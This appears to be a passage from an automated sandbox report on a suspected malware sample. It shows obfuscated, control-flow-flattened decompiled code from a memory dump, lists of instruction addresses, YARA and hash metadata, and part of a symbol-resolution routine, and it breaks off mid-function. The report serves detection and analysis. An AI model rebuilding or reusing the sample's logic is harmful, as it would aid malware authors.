				_v304 = _v304 + 0xffff2ee4;
				_v304 = _v304 ^ 0x6dee6434;
				while(1) {
					L1:
					_t878 = 0xa919dff;
					_t1020 = 0x64ec131;
					_t948 = 0x5e7327f;
					do {
						while(1) {
							L2:
							_t1056 = _t925 - 0x7579ad8;
							if(_t1056 > 0) {
								break;
							}
							if(_t1056 == 0) {
								_t925 = 0xd75c4eb;
								continue;
							} else {
								if(_t925 == _t948) {
									_push(_v196);
									_push(_v332);
									_t886 = E0111CD35(0x1101330, _v364, __eflags);
									_push(_v136);
									_t1045 = _t886;
									_push(_v252);
									_t887 = E0111CD35(0x11012e0, _v432, __eflags);
									_v64 = _v220;
									_t889 = E0110B01D(_v88, _v128, _t1045, _v96);
									_t960 = 0x20;
									_v56 = _v56 & 0x00000000;
									_v68 = 2 + _t889 * 2;
									_v76 = _t960;
									_v48 =  &_v68;
									_v60 = _t1045;
									_v52 = 1;
									__eflags = E011222FA(_v280,  &_v76,  &_v56, _t960, _v416, _t887, _v288, _v204, _v292, _v184, _v424,  &_v32, _v72) - _v180;
									_t925 =  ==  ? 0x64ec131 : 0xe1e175e;
									E0111629F(_v400, _t1045, _v408, _v272, _v172);
									E0111629F(_v248, _t887, _v256, _v392, _v264);
									_t1051 =  &(_t1051[0x17]);
									L15:
									_t1041 = 0xe1e175e;
									goto L26;
								} else {
									if(_t925 == _t1020) {
										_push(_v112);
										_push(_v212);
										_t899 = E0111CD35(0x1101300, _v160, __eflags);
										_pop(_t967);
										__eflags = E0110EC68( *0x1125220 + 0x4c,  &_v76, _v80, _v144, _t899, _v104, _v268, _t967, _v152, _v380, _v92, _v340) - _v84;
										_t925 =  ==  ? 0xa919dff : _t1041;
										E0111629F(_v372, _t899, _v260, _v316, _v228);
										_t1051 =  &(_t1051[0xd]);
										goto L26;
									} else {
										if(_t925 == 0x6b8fa15) {
											_push(_v300);
											_push(_v420);
											_t904 = E0111CD35(0x11013b0, _v100, __eflags);
											_pop(_t974);
											_t1047 = _t904;
											_v44 = _v284;
											_v40 = _v120;
											_v36 = _v176;
											_t912 = E0111B4AE(_v348,  *((intOrPtr*)( *0x1125220 + 0x4c)), _v404,  &_v44,  *((intOrPtr*)( *0x1125220 + 0x48)), _v80, _v324,  *0x1125220 + 0x44, _v412, _v188, _t904, _v356, _t974, 0x11013b0, _v236);
											_t1054 =  &(_t1051[0xd]);
											__eflags = _t912 - _v396;
											if(_t912 != _v396) {
												_t925 = 0x7142ff7;
											} else {
												_t925 = _t1041;
												_t1049 = 1;
											}
											E0111629F(_v388, _t1047, _v308, _v276, _v168);
											_t1051 =  &(_t1054[3]);
											L26:
											_t878 = 0xa919dff;
											_t948 = 0x5e7327f;
											_t1020 = 0x64ec131;
											goto L27;
										} else {
											if(_t925 != 0x7142ff7) {
												goto L27;
											} else {
												E0110AE43( *((intOrPtr*)( *0x1125220 + 0x48)), _v244, _v428);
												_t925 = _t1041;
												while(1) {
													L1:
													_t878 = 0xa919dff;
													_t1020 = 0x64ec131;
													_t948 = 0x5e7327f;
													goto L2;
												}
											}
										}
									}
								}
							}
							L21:
							return _t1049;
						}
						__eflags = _t925 - _t878;
						if(_t925 == _t878) {
							_push(_t948);
							_push(_t948);
							_t949 = E01115212( *((intOrPtr*)( *0x1125220 + 0x4c)));
							_t1051 =  &(_t1051[3]);
							 *((intOrPtr*)( *0x1125220 + 0x48)) = _t949;
							__eflags = _t949;
							if(__eflags == 0) {
								_t925 = _t1041;
								goto L26;
							} else {
								_t925 = 0x6b8fa15;
								goto L1;
							}
						} else {
							__eflags = _t925 - 0xd75c4eb;
							if(__eflags == 0) {
								_push(_v384);
								_push(_v376);
								_t916 = E0111CD35(0x1101290, _v368, __eflags);
								_push(_v360);
								_push(_v352);
								_t917 = E0111CD35(0x1101250, _v344, __eflags);
								_t807 =  &_v336; // 0x6dee6434
								__eflags = E0111D96C(_v240,  *_t807,  &_v80, _v156, _v164, _t917, _t916) - _v232;
								_t925 =  ==  ? 0x5e7327f : 0xce84384;
								E0111629F(_v140, _t916, _v224, _v148, _v328);
								E0111629F(_v312, _t917, _v216, _v320, _v132);
								_t1051 =  &(_t1051[0xf]);
								goto L15;
							} else {
								__eflags = _t925 - _t1041;
								if(_t925 != _t1041) {
									goto L27;
								} else {
									_t793 =  &_v304; // 0x6dee6434
									E01114827(_v80, _v108, _v296, _v192,  *_t793);
								}
							}
						}
						goto L21;
						L27:
						__eflags = _t925 - 0xce84384;
					} while (__eflags != 0);
					goto L21;
				}
			}

















































































































































                          0x0111eded
                          0x0111edf3
                          0x0111ee0c
                          0x0111ee13
                          0x0111ee15
                          0x0111ee20
                          0x0111ee25
                          0x0111ee30
                          0x0111ee3b
                          0x0111ee43
                          0x0111ee4e
                          0x0111ee59
                          0x0111ee6d
                          0x0111ee74
                          0x0111ee79
                          0x0111ee82
                          0x0111ee8d
                          0x0111ee98
                          0x0111eea3
                          0x0111eeae
                          0x0111eeb9
                          0x0111eec4
                          0x0111eecf
                          0x0111eeda
                          0x0111eee2
                          0x0111eee7
                          0x0111eef1
                          0x0111eef2
                          0x0111eef6
                          0x0111eefe
                          0x0111ef09
                          0x0111ef14
                          0x0111ef1f
                          0x0111ef27
                          0x0111ef2f
                          0x0111ef37
                          0x0111ef3f
                          0x0111ef47
                          0x0111ef5a
                          0x0111ef61
                          0x0111ef6c
                          0x0111ef77
                          0x0111ef7f
                          0x0111ef8a
                          0x0111ef95
                          0x0111efa3
                          0x0111efac
                          0x0111efb0
                          0x0111efb8
                          0x0111efc0
                          0x0111efd3
                          0x0111efda
                          0x0111efe5
                          0x0111eff0
                          0x0111effb
                          0x0111f006
                          0x0111f00e
                          0x0111f019
                          0x0111f021
                          0x0111f029
                          0x0111f02e
                          0x0111f036
                          0x0111f03e
                          0x0111f046
                          0x0111f04e
                          0x0111f056
                          0x0111f05d
                          0x0111f065
                          0x0111f073
                          0x0111f078
                          0x0111f07e
                          0x0111f086
                          0x0111f08e
                          0x0111f096
                          0x0111f09e
                          0x0111f0a6
                          0x0111f0ae
                          0x0111f0b6
                          0x0111f0be
                          0x0111f0c6
                          0x0111f0ce
                          0x0111f0da
                          0x0111f0df
                          0x0111f0e5
                          0x0111f0ed
                          0x0111f0f9
                          0x0111f0fe
                          0x0111f104
                          0x0111f10c
                          0x0111f114
                          0x0111f11c
                          0x0111f127
                          0x0111f12f
                          0x0111f13a
                          0x0111f145
                          0x0111f14d
                          0x0111f152
                          0x0111f15f
                          0x0111f160
                          0x0111f164
                          0x0111f16c
                          0x0111f177
                          0x0111f182
                          0x0111f18d
                          0x0111f1a1
                          0x0111f1a8
                          0x0111f1b3
                          0x0111f1be
                          0x0111f1c6
                          0x0111f1d1
                          0x0111f1dc
                          0x0111f1e7
                          0x0111f1ef
                          0x0111f1fa
                          0x0111f207
                          0x0111f20b
                          0x0111f218
                          0x0111f21c
                          0x0111f224
                          0x0111f22f
                          0x0111f23a
                          0x0111f245
                          0x0111f24c
                          0x0111f257
                          0x0111f262
                          0x0111f26d
                          0x0111f278
                          0x0111f283
                          0x0111f28d
                          0x0111f298
                          0x0111f29f
                          0x0111f2aa
                          0x0111f2b5
                          0x0111f2c0
                          0x0111f2cb
                          0x0111f2d3
                          0x0111f2db
                          0x0111f2e3
                          0x0111f2eb
                          0x0111f2f3
                          0x0111f2fb
                          0x0111f303
                          0x0111f30b
                          0x0111f313
                          0x0111f31b
                          0x0111f326
                          0x0111f33a
                          0x0111f33f
                          0x0111f348
                          0x0111f353
                          0x0111f35b
                          0x0111f363
                          0x0111f36b
                          0x0111f370
                          0x0111f378
                          0x0111f383
                          0x0111f38e
                          0x0111f396
                          0x0111f3a1
                          0x0111f3ac
                          0x0111f3b4
                          0x0111f3bf
                          0x0111f3ca
                          0x0111f3d2
                          0x0111f3dd
                          0x0111f3e8
                          0x0111f3f3
                          0x0111f3fe
                          0x0111f409
                          0x0111f414
                          0x0111f41f
                          0x0111f42a
                          0x0111f435
                          0x0111f440
                          0x0111f44b
                          0x0111f453
                          0x0111f45d
                          0x0111f45e
                          0x0111f462
                          0x0111f46a
                          0x0111f472
                          0x0111f47d
                          0x0111f488
                          0x0111f490
                          0x0111f49b
                          0x0111f4a6
                          0x0111f4b1
                          0x0111f4b9
                          0x0111f4c4
                          0x0111f4cf
                          0x0111f4da
                          0x0111f4e5
                          0x0111f4f0
                          0x0111f4fb
                          0x0111f503
                          0x0111f50e
                          0x0111f51c
                          0x0111f520
                          0x0111f528
                          0x0111f530
                          0x0111f53a
                          0x0111f542
                          0x0111f547
                          0x0111f54f
                          0x0111f557
                          0x0111f55f
                          0x0111f56a
                          0x0111f572
                          0x0111f57d
                          0x0111f588
                          0x0111f593
                          0x0111f59e
                          0x0111f5a9
                          0x0111f5b4
                          0x0111f5bf
                          0x0111f5ca
                          0x0111f5d5
                          0x0111f5e0
                          0x0111f5eb
                          0x0111f5f6
                          0x0111f601
                          0x0111f609
                          0x0111f611
                          0x0111f619
                          0x0111f621
                          0x0111f62c
                          0x0111f634
                          0x0111f63f
                          0x0111f64a
                          0x0111f655
                          0x0111f660
                          0x0111f66b
                          0x0111f676
                          0x0111f67e
                          0x0111f686
                          0x0111f691
                          0x0111f69c
                          0x0111f6a4
                          0x0111f6af
                          0x0111f6ba
                          0x0111f6c5
                          0x0111f6d0
                          0x0111f6db
                          0x0111f6e6
                          0x0111f6f1
                          0x0111f705
                          0x0111f70a
                          0x0111f713
                          0x0111f71e
                          0x0111f729
                          0x0111f734
                          0x0111f73f
                          0x0111f74a
                          0x0111f756
                          0x0111f75b
                          0x0111f765
                          0x0111f768
                          0x0111f76c
                          0x0111f771
                          0x0111f779
                          0x0111f784
                          0x0111f78c
                          0x0111f797
                          0x0111f79f
                          0x0111f7a7
                          0x0111f7af
                          0x0111f7b7
                          0x0111f7bf
                          0x0111f7ca
                          0x0111f7d7
                          0x0111f7df
                          0x0111f7ea
                          0x0111f7fe
                          0x0111f803
                          0x0111f80c
                          0x0111f814
                          0x0111f81c
                          0x0111f827
                          0x0111f832
                          0x0111f844
                          0x0111f849
                          0x0111f852
                          0x0111f85d
                          0x0111f868
                          0x0111f873
                          0x0111f87e
                          0x0111f889
                          0x0111f894
                          0x0111f89f
                          0x0111f8aa
                          0x0111f8b5
                          0x0111f8bd
                          0x0111f8c8
                          0x0111f8da
                          0x0111f8df
                          0x0111f8e8
                          0x0111f8f3
                          0x0111f8fe
                          0x0111f906
                          0x0111f911
                          0x0111f919
                          0x0111f921
                          0x0111f925
                          0x0111f92d
                          0x0111f93f
                          0x0111f944
                          0x0111f94d
                          0x0111f958
                          0x0111f963
                          0x0111f96e
                          0x0111f97b
                          0x0111f97c
                          0x0111f980
                          0x0111f988
                          0x0111f990
                          0x0111f998
                          0x0111f9a0
                          0x0111f9ad
                          0x0111f9b1
                          0x0111f9b9
                          0x0111f9c1
                          0x0111f9c9
                          0x0111f9d7
                          0x0111f9db
                          0x0111f9e3
                          0x0111f9eb
                          0x0111f9f3
                          0x0111f9fb
                          0x0111fa05
                          0x0111fa0a
                          0x0111fa0f
                          0x0111fa17
                          0x0111fa22
                          0x0111fa2a
                          0x0111fa35
                          0x0111fa3d
                          0x0111fa4b
                          0x0111fa50
                          0x0111fa54
                          0x0111fa5c
                          0x0111fa64
                          0x0111fa6c
                          0x0111fa74
                          0x0111fa80
                          0x0111fa81
                          0x0111fa83
                          0x0111fa87
                          0x0111fa8f
                          0x0111faa2
                          0x0111faa9
                          0x0111fab4
                          0x0111fabf
                          0x0111faca
                          0x0111fad5
                          0x0111fae0
                          0x0111fae8
                          0x0111faf3
                          0x0111fafe
                          0x0111fb06
                          0x0111fb11
                          0x0111fb27
                          0x0111fb39
                          0x0111fb40
                          0x0111fb4b
                          0x0111fb53
                          0x0111fb5b
                          0x0111fb67
                          0x0111fb6a
                          0x0111fb6e
                          0x0111fb76
                          0x0111fb81
                          0x0111fb8c
                          0x0111fb97
                          0x0111fba2
                          0x0111fbaa
                          0x0111fbb5
                          0x0111fbc0
                          0x0111fbd3
                          0x0111fbda
                          0x0111fbe2
                          0x0111fbed
                          0x0111fbf8
                          0x0111fbf8
                          0x0111fbf8
                          0x0111fbfd
                          0x0111fc02
                          0x0111fc07
                          0x0111fc07
                          0x0111fc07
                          0x0111fc07
                          0x0111fc0d
                          0x00000000
                          0x00000000
                          0x0111fc13
                          0x0111ff3e
                          0x00000000
                          0x0111fc19
                          0x0111fc1b
                          0x0111fde7
                          0x0111fdf3
                          0x0111fdfb
                          0x0111fe00
                          0x0111fe0c
                          0x0111fe0e
                          0x0111fe19
                          0x0111fe3d
                          0x0111fe44
                          0x0111fe4b
                          0x0111fe5a
                          0x0111fe62
                          0x0111fe77
                          0x0111fe7e
                          0x0111fe98
                          0x0111fea6
                          0x0111feea
                          0x0111fefa
                          0x0111ff0c
                          0x0111ff2c
                          0x0111ff31
                          0x0111ff34
                          0x0111ff34
                          0x00000000
                          0x0111fc21
                          0x0111fc23
                          0x0111fd3b
                          0x0111fd47
                          0x0111fd55
                          0x0111fd5b
                          0x0111fdbb
                          0x0111fdc9
                          0x0111fdda
                          0x0111fddf
                          0x00000000
                          0x0111fc29
                          0x0111fc2f
                          0x0111fc5b
                          0x0111fc67
                          0x0111fc72
                          0x0111fc78
                          0x0111fc79
                          0x0111fc82
                          0x0111fc90
                          0x0111fca5
                          0x0111fcf9
                          0x0111fcfe
                          0x0111fd01
                          0x0111fd05
                          0x0111fd0e
                          0x0111fd07
                          0x0111fd09
                          0x0111fd0b
                          0x0111fd0b
                          0x0111fd2e
                          0x0111fd33
                          0x011200a1
                          0x011200a1
                          0x011200a6
                          0x011200ab
                          0x00000000
                          0x0111fc31
                          0x0111fc37
                          0x00000000
                          0x0111fc3d
                          0x0111fc51
                          0x0111fc57
                          0x0111fbf8
                          0x0111fbf8
                          0x0111fbf8
                          0x0111fbfd
                          0x0111fc02
                          0x00000000
                          0x0111fc02
                          0x0111fbf8
                          0x0111fc37
                          0x0111fc2f
                          0x0111fc23
                          0x0111fc1b
                          0x0111ff8d
                          0x0111ff97
                          0x0111ff97
                          0x0111ff48
                          0x0111ff4a
                          0x0112007a
                          0x0112007b
                          0x01120084
                          0x01120086
                          0x0112008e
                          0x01120091
                          0x01120093
                          0x0112009f
                          0x00000000
                          0x01120095
                          0x01120095
                          0x00000000
                          0x01120095
                          0x0111ff50
                          0x0111ff50
                          0x0111ff56
                          0x0111ff98
                          0x0111ffa1
                          0x0111ffa9
                          0x0111ffae
                          0x0111ffb9
                          0x0111ffc1
                          0x0111ffdf
                          0x0112000a
                          0x01120018
                          0x01120029
                          0x0112004c
                          0x01120051
                          0x00000000
                          0x0111ff58
                          0x0111ff58
                          0x0111ff5a
                          0x00000000
                          0x0111ff60
                          0x0111ff60
                          0x0111ff83
                          0x0111ff88
                          0x0111ff5a
                          0x0111ff56
                          0x00000000
                          0x011200b0
                          0x011200b0
                          0x011200b0
                          0x00000000
                          0x011200bc

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: >:$1$4dm$4dm$:=_$EN5$N9$N]$Nm.$_:$d"F$nM=$o/$p[$rVs$tA$wP$x0e$6(j$y
                          • API String ID: 0-3648772094
                          • Opcode ID: d1b10a02597c256e3437f51986c98643207f15c508bd713cf513d3d590364ee5
                          • Instruction ID: a298963cce440c13b09251eb43f5ce8b4f3116121273ec511a4e00b63d7f1e7e
                          • Opcode Fuzzy Hash: d1b10a02597c256e3437f51986c98643207f15c508bd713cf513d3d590364ee5
                          • Instruction Fuzzy Hash: 5492FF715093818FD3B9CF25C98AB9BBBE1BBC5308F10891DE1DA86264D7B18949CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDE890, Relevance: 25.1, APIs: 9, Strings: 5, Instructions: 588libraryloaderCOMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 52%
                          			E6ECDE890(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi) {
				void* _v16;
				char _v4528;
				void* __ebp;
				char* _t225;
				void* _t234;
				void* _t237;
				signed int _t240;
				signed int _t243;
				signed char _t249;
				intOrPtr _t250;
				void* _t255;
				intOrPtr _t256;
				signed int _t258;
				signed char _t262;
				signed int _t265;
				signed short _t267;
				signed short* _t269;
				signed int _t273;
				void* _t277;
				void* _t278;
				intOrPtr _t279;
				signed int _t281;
				void* _t283;
				intOrPtr _t284;
				signed int _t286;
				signed short _t290;
				signed int _t292;
				signed short* _t293;
				signed short _t294;
				signed int _t297;
				signed int _t298;
				signed int _t301;
				signed int _t302;
				signed int _t304;
				signed int _t309;
				signed int _t310;
				signed int _t312;
				signed short* _t317;
				intOrPtr _t321;
				intOrPtr _t322;
				void* _t328;
				signed int _t330;
				intOrPtr _t333;
				signed int _t337;
				void* _t338;
				void* _t346;
				intOrPtr _t350;
				signed short* _t353;
				signed int _t354;
				signed int _t357;
				void* _t358;
				signed int _t365;
				void* _t366;
				signed short* _t369;
				signed int _t371;
				signed int _t373;
				signed short* _t379;
				signed int _t381;
				signed char _t384;
				signed char _t385;
				intOrPtr _t392;
				signed int* _t393;
				signed char _t394;
				signed int _t397;
				signed char _t398;
				signed int _t399;
				signed int _t400;
				signed short _t401;
				signed int _t407;
				signed int _t409;
				signed char _t410;
				signed int _t411;
				signed short _t412;
				signed int _t418;
				intOrPtr _t421;
				signed int _t423;
				signed int _t424;

				_t365 = __edx;
				_t321 = __ecx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t424 = _t423 & 0xfffffff0;
				E6ECEA000(0x11b0);
				_t418 = _t424;
				 *((intOrPtr*)(_t418 + 0x1198)) = _t421;
				 *(_t418 + 0x119c) = _t424;
				 *(_t418 + 0x11a8) = 0xffffffff;
				 *((intOrPtr*)(_t418 + 0x11a4)) = E6ECE3BB0;
				 *((intOrPtr*)(_t418 + 0x11a0)) =  *[fs:0x0];
				 *[fs:0x0] = _t418 + 0x11a0;
				 *((intOrPtr*)(_t418 + 0x5c)) = __edx;
				_t225 =  *((intOrPtr*)(__ecx));
				if( *_t225 != 0 ||  *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)))) <= 0x64) {
					_t392 =  *((intOrPtr*)(_t321 + 8));
					_t301 =  *(_t321 + 0xc);
					 *((intOrPtr*)(_t418 + 0x80)) = _t321;
					_t322 =  *((intOrPtr*)(_t321 + 0x10));
					 *(_t418 + 0x1c) = _t365;
					_t366 = _t418 + 0x12;
					 *(_t418 + 0x12) = 0;
					 *((char*)(_t418 + 0x13)) = 0;
					 *(_t418 + 0x84) = _t366;
					 *((intOrPtr*)(_t418 + 0x88)) = _t225;
					 *((intOrPtr*)(_t418 + 0x8c)) = _t392;
					 *((intOrPtr*)(_t418 + 0x90)) = _t418 + 0x13;
					 *(_t418 + 0x94) = _t301;
					 *((intOrPtr*)(_t418 + 0x98)) = _t322;
					 *((intOrPtr*)(_t418 + 0x7c)) = _t392;
					 *(_t418 + 0x58) = _t301;
					 *((intOrPtr*)(_t418 + 0x78)) = _t322;
					 *((intOrPtr*)(_t418 + 0x9c)) = _t418 + 0x5c;
					if(E6ECDE690(_t301, _t392, _t418) == 0) {
						_t393 =  *(_t418 + 0x1c);
						 *(_t418 + 0x2c) = _t366;
						__eflags =  *_t393 ^ 0x00000001 | _t393[1];
						if(( *_t393 ^ 0x00000001 | _t393[1]) != 0) {
							E6ECEC310(_t393, _t418 + 0x1a4, 0, 0xff4);
							_t424 = _t424 + 0xc;
							_t302 =  *0x6ed2adfc; // 0x0
							 *((intOrPtr*)(_t418 + 0x1f0)) = 0x7d0;
							 *((intOrPtr*)(_t418 + 0x1a0)) = 0x58;
							__eflags = _t302;
							if(_t302 != 0) {
								L33:
								_t234 = GetCurrentProcess();
								_t394 = _t393[0x45];
								 *(_t418 + 0x18) = _t234;
								 *(_t418 + 0xa4) = 0;
								 *(_t418 + 0xa0) = 0;
								_t369 =  <  ? 0 : _t393[2] - 1;
								 *(_t418 + 0x20) = _t394;
								 *(_t418 + 0x30) = _t369;
								_t237 =  *_t302( *(_t418 + 0x18), _t369, 0, _t394, _t418 + 0xa0, _t418 + 0x1a0);
								__eflags = _t237 - 1;
								if(_t237 != 1) {
									goto L75;
								} else {
									_t250 =  *((intOrPtr*)(_t418 + 0x1ec));
									asm("xorps xmm0, xmm0");
									_t304 = _t418 + 0x1f4;
									_t371 = _t418 + 0xa0;
									 *(_t418 + 0xc) = 0;
									asm("movaps [esi+0x190], xmm0");
									asm("movaps [esi+0x180], xmm0");
									asm("movaps [esi+0x170], xmm0");
									asm("movaps [esi+0x160], xmm0");
									asm("movaps [esi+0x150], xmm0");
									asm("movaps [esi+0x140], xmm0");
									asm("movaps [esi+0x130], xmm0");
									asm("movaps [esi+0x120], xmm0");
									asm("movaps [esi+0x110], xmm0");
									asm("movaps [esi+0x100], xmm0");
									asm("movaps [esi+0xf0], xmm0");
									asm("movaps [esi+0xe0], xmm0");
									asm("movaps [esi+0xd0], xmm0");
									asm("movaps [esi+0xc0], xmm0");
									asm("movaps [esi+0xb0], xmm0");
									asm("movaps [esi+0xa0], xmm0");
									_t328 =  *((intOrPtr*)(_t418 + 0x1f0)) - 1;
									__eflags = _t250 - _t328;
									_t329 =  <=  ? _t250 : _t328;
									_t330 = 0;
									 *(_t418 + 0x14) = _t418 + 0x1f4 + ( <=  ? _t250 : _t328) * 2;
									__eflags = 0;
									 *(_t418 + 0x18) = 0x100;
									if(0 == 0) {
										L37:
										__eflags = _t304 -  *(_t418 + 0x14);
										if(_t304 !=  *(_t418 + 0x14)) {
											_t400 = _t304;
											_t304 = _t304 + 2;
											__eflags = _t304;
											_t401 =  *_t400 & 0x0000ffff;
											goto L39;
										}
									} else {
										asm("o16 nop [cs:eax+eax]");
										L36:
										_t401 = _t330 >> 0x10;
										L39:
										 *(_t418 + 0x1c) = _t330 & 0xffff0000;
										__eflags = (_t401 & 0x0000f800) - 0xd800;
										if((_t401 & 0x0000f800) != 0xd800) {
											 *(_t418 + 0x24) = _t304;
											_t337 = _t401 & 0x0000ffff;
											_t262 = 0;
										} else {
											_t269 = _t304;
											_t337 = 0;
											__eflags = (_t401 & 0x0000ffff) - 0xdbff;
											if((_t401 & 0x0000ffff) <= 0xdbff) {
												_t309 =  *(_t418 + 0x14);
												__eflags = _t269 - _t309;
												if(_t269 == _t309) {
													 *(_t418 + 0x24) = _t309;
													goto L48;
												} else {
													_t310 =  *_t269 & 0x0000ffff;
													 *(_t418 + 0x24) =  &(_t269[1]);
													 *(_t418 + 0x28) = _t310;
													__eflags = (_t310 & 0x0000fc00) - 0xdc00;
													if((_t310 & 0x0000fc00) != 0xdc00) {
														 *(_t418 + 0x1c) = ( *(_t418 + 0x28) & 0x0000ffff) << 0x00000010 | 0x00000001;
														asm("o16 nop [eax+eax]");
														goto L48;
													} else {
														_t262 = 0;
														_t337 = ( *(_t418 + 0x28) + 0x00002400 & 0x0000ffff | (_t401 + 0x00002800 & 0x0000ffff) << 0x0000000a) + 0x10000;
													}
												}
											} else {
												 *(_t418 + 0x24) = _t269;
												L48:
												_t262 = 1;
											}
										}
										_t304 =  *(_t418 + 0x18);
										__eflags = _t262 & 0x00000001;
										_t394 = 1;
										_t338 =  !=  ? 0xfffd : _t337;
										__eflags = _t338 - 0x80;
										if(_t338 >= 0x80) {
											_t394 = 2;
											__eflags = _t338 - 0x800;
											if(_t338 >= 0x800) {
												__eflags = _t338 - 0x10000;
												_t394 = 4;
												asm("sbb edi, 0x0");
											}
										}
										_t265 = _t304 - _t394;
										__eflags = _t265;
										 *(_t418 + 0x28) = _t265;
										if(_t265 > 0) {
											 *(_t418 + 0x34) = _t394;
											 *(_t418 + 0x11a8) = 0;
											 *(_t418 + 0x18) = _t371;
											E6ECDDD00(_t304, _t338, _t371, _t394, _t418, _t421, _t304);
											_t424 = _t424 + 4;
											_t267 =  *(_t418 + 0x34);
											_t330 =  *(_t418 + 0x1c);
											_t304 =  *(_t418 + 0x24);
											_t371 =  *(_t418 + 0x18) + _t267;
											 *(_t418 + 0xc) =  *(_t418 + 0xc) + _t267;
											__eflags = _t330;
											 *(_t418 + 0x18) =  *(_t418 + 0x28);
											if(_t330 != 0) {
												goto L36;
											} else {
												goto L37;
											}
										}
									}
									__eflags =  *(_t418 + 0xc) - 0x101;
									if(__eflags >= 0) {
										 *(_t418 + 0x11a8) = 0;
										E6ECF6DB0(_t304,  *(_t418 + 0xc), 0x100, _t394, _t418, __eflags, 0x6ed1e1dc);
										goto L87;
									} else {
										_t397 =  *0x6ed2ae00; // 0x0
										asm("xorps xmm0, xmm0");
										 *(_t418 + 0x74) = 0;
										 *(_t418 + 0x70) = 0;
										asm("movaps [esi+0x60], xmm0");
										 *((intOrPtr*)(_t418 + 0x60)) = 0x18;
										__eflags = _t397;
										if(_t397 != 0) {
											L67:
											_t255 = GetCurrentProcess();
											_t333 = _t418 + 0x60;
											 *(_t418 + 0x38) = 0;
											_t373 = _t418 + 0x38;
											_t256 =  *_t397(_t255,  *(_t418 + 0x30), 0,  *(_t418 + 0x20), 0, 0, _t373, _t333);
											__eflags = _t256 - 1;
											if(_t256 != 1) {
												_t398 = 0;
												__eflags = 0;
											} else {
												_t256 =  *((intOrPtr*)(_t418 + 0x68));
												_t333 =  *((intOrPtr*)(_t418 + 0x6c));
												_t399 = 0;
												__eflags = 0;
												asm("o16 nop [cs:eax+eax]");
												do {
													_t373 = _t399;
													_t399 = _t399 + 1;
													__eflags =  *((short*)(_t333 + _t373 * 2));
												} while ( *((short*)(_t333 + _t373 * 2)) != 0);
												 *(_t418 + 0x11a8) = 0;
												_t398 = 1;
											}
											 *(_t418 + 0x11a8) = 0;
											 *(_t418 + 0x38) = _t418 + 0xa0;
											 *(_t418 + 0x3c) =  *(_t418 + 0xc);
											 *((intOrPtr*)(_t418 + 0x40)) =  *((intOrPtr*)(_t418 + 0x1d8));
											 *(_t418 + 0x44) = _t398;
											 *((intOrPtr*)(_t418 + 0x48)) = _t256;
											 *(_t418 + 0x4c) = _t398;
											 *((intOrPtr*)(_t418 + 0x50)) = _t333;
											 *(_t418 + 0x54) = _t373;
											E6ECDFA10(_t418 + 0x84, _t418 + 0x38);
											goto L75;
										} else {
											_t258 = GetProcAddress( *0x6ed2add0, "SymGetLineFromInlineContextW");
											__eflags = _t258;
											if(__eflags == 0) {
												 *(_t418 + 0x11a8) = 0;
												E6ECF6E20(_t304, "called `Option::unwrap()` on a `None` value", 0x2b, _t397, _t418, __eflags, 0x6ed1e2c0);
												goto L87;
											} else {
												_t397 = _t258;
												 *0x6ed2ae00 = _t258;
												goto L67;
											}
										}
									}
								}
							} else {
								_t273 = GetProcAddress( *0x6ed2add0, "SymFromInlineContextW");
								__eflags = _t273;
								if(__eflags == 0) {
									 *(_t418 + 0x11a8) = 0;
									E6ECF6E20(_t302, "called `Option::unwrap()` on a `None` value", 0x2b, _t393, _t418, __eflags, 0x6ed1e2c0);
									goto L87;
								} else {
									_t302 = _t273;
									 *0x6ed2adfc = _t273;
									goto L33;
								}
							}
						} else {
							_t312 = _t393[2];
							E6ECEC310(_t393, _t418 + 0x1a4, 0, 0xff4);
							_t424 = _t424 + 0xc;
							_t407 =  *0x6ed2adf0; // 0x0
							 *((intOrPtr*)(_t418 + 0x1f0)) = 0x7d0;
							 *((intOrPtr*)(_t418 + 0x1a0)) = 0x58;
							__eflags = _t407;
							if(_t407 != 0) {
								L9:
								_t277 = GetCurrentProcess();
								 *(_t418 + 0xa4) = 0;
								 *(_t418 + 0xa0) = 0;
								_t278 =  *_t407(_t277, _t312, 0, _t418 + 0xa0, _t418 + 0x1a0);
								__eflags = _t278 - 1;
								if(_t278 != 1) {
									L75:
									ReleaseMutex( *(_t418 + 0x2c));
									__eflags =  *((char*)(_t418 + 0x13));
									if( *((char*)(_t418 + 0x13)) != 0) {
										goto L4;
									} else {
										goto L76;
									}
									goto L80;
								} else {
									_t279 =  *((intOrPtr*)(_t418 + 0x1ec));
									asm("xorps xmm0, xmm0");
									_t408 = 0x100;
									 *(_t418 + 0x20) = 0;
									 *(_t418 + 0x14) = _t312;
									asm("movaps [esi+0x190], xmm0");
									asm("movaps [esi+0x180], xmm0");
									asm("movaps [esi+0x170], xmm0");
									asm("movaps [esi+0x160], xmm0");
									asm("movaps [esi+0x150], xmm0");
									asm("movaps [esi+0x140], xmm0");
									asm("movaps [esi+0x130], xmm0");
									asm("movaps [esi+0x120], xmm0");
									asm("movaps [esi+0x110], xmm0");
									asm("movaps [esi+0x100], xmm0");
									asm("movaps [esi+0xf0], xmm0");
									asm("movaps [esi+0xe0], xmm0");
									asm("movaps [esi+0xd0], xmm0");
									asm("movaps [esi+0xc0], xmm0");
									asm("movaps [esi+0xb0], xmm0");
									asm("movaps [esi+0xa0], xmm0");
									_t346 =  *((intOrPtr*)(_t418 + 0x1f0)) - 1;
									__eflags = _t279 - _t346;
									_t347 =  <=  ? _t279 : _t346;
									_t379 = _t418 + 0x1f4 + ( <=  ? _t279 : _t346) * 2;
									 *(_t418 + 0xc) = _t418 + 0x1f4;
									_t281 = 0;
									 *(_t418 + 0x30) = _t379;
									__eflags = 0;
									 *(_t418 + 0x1c) = _t418 + 0xa0;
									 *(_t418 + 0x28) = 0x100;
									if(0 == 0) {
										L13:
										__eflags =  *(_t418 + 0xc) - _t379;
										if( *(_t418 + 0xc) != _t379) {
											_t353 =  *(_t418 + 0xc);
											_t412 =  *_t353 & 0x0000ffff;
											_t354 =  &(_t353[1]);
											__eflags = _t354;
											 *(_t418 + 0xc) = _t354;
											goto L15;
										}
									} else {
										L12:
										_t412 = _t281 >> 0x10;
										L15:
